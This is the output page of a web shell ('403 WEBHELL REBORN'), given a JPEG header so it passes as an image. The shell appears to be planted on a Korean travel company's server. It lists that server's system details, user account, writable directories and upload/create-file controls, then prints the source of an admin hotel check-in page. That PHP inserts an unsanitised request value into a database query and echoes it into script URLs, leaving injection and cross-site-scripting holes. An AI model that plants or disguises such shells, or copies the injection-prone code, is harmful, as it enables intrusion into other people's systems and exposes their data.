ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/toadmin/hotel_tw/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/toadmin/hotel_tw/hotel_date.html
<?
include "../include/top.html";
include "_common.php";

// 상품정보
$arr = hotel_list(" and hseq='{$hseq}' ");
$row = $arr[0];

// 룸타입 목록
$rdata = array('hseq'=>$hseq,'disp_yn'=>'Y');
$data_roomtype = hotel_roomtype($rdata);
$ridx_s = $data_roomtype[0]['ridx'];
?>
<div class="contents_wrap">
	<div class="contents_wrap_in">
		<div class="title"><?=$row['hotel_nm']?><span class="arrow">&gt;</span><strong>입실 관리</strong></div>
		<div class="contents_detail">

		<div id="Content_box">

			<!-- 본문 -->
			<?
				include "_menu.html";
			?>
				<!-- 룸타입 목록 -->
				<div  id="ajax_room_type"></div>
				<!-- /룸타입명 목록 -->
				<!-- 룸입실 달력 -->
				<div id="ajax_room_date"></div>
				<!-- /룸입실 달력 -->
			<!-- /본문 -->
		</div>
	</div>
</div>
</div>


<script type="text/javascript">
$(document).ready(function(){
	// 행사메뉴
	ajax_post('ajax_room_type','hotel_date_roomtype_list.html?hseq=<?=$hseq?>');

	// 입실일 목록
	ajax_post('ajax_room_date','hotel_date_list_ajax.html?hseq=<?=$hseq?>&ridx=<?=$ridx_s?>');
});

</script>
<?
include "../include/footer.html";
?>

Anon7 - 2021